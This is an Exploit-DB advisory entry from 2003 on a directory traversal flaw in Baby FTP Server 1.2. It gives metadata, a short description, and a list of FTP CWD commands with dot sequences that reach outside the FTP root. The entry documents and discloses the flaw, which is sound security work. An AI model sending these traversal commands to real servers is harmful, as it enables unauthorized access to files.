pablo software Solutions baby ftp server 1.2 - Directory Traversal

EDB-ID:

22691

CVE:

N/A

Author:

dr_insane

Type:

remote

Platform:

Windows

Published:

2003-05-29

source: http://www.securityfocus.com/bid/7749/info

It has been reported that Baby FTP Server does not properly handle some types of requests. This may make it possible for a remote user to gain access to resources outside of the FTP root directory. 

CWD ...
CWD /...
CWD /......
CWD \...
CWD ...CWD .../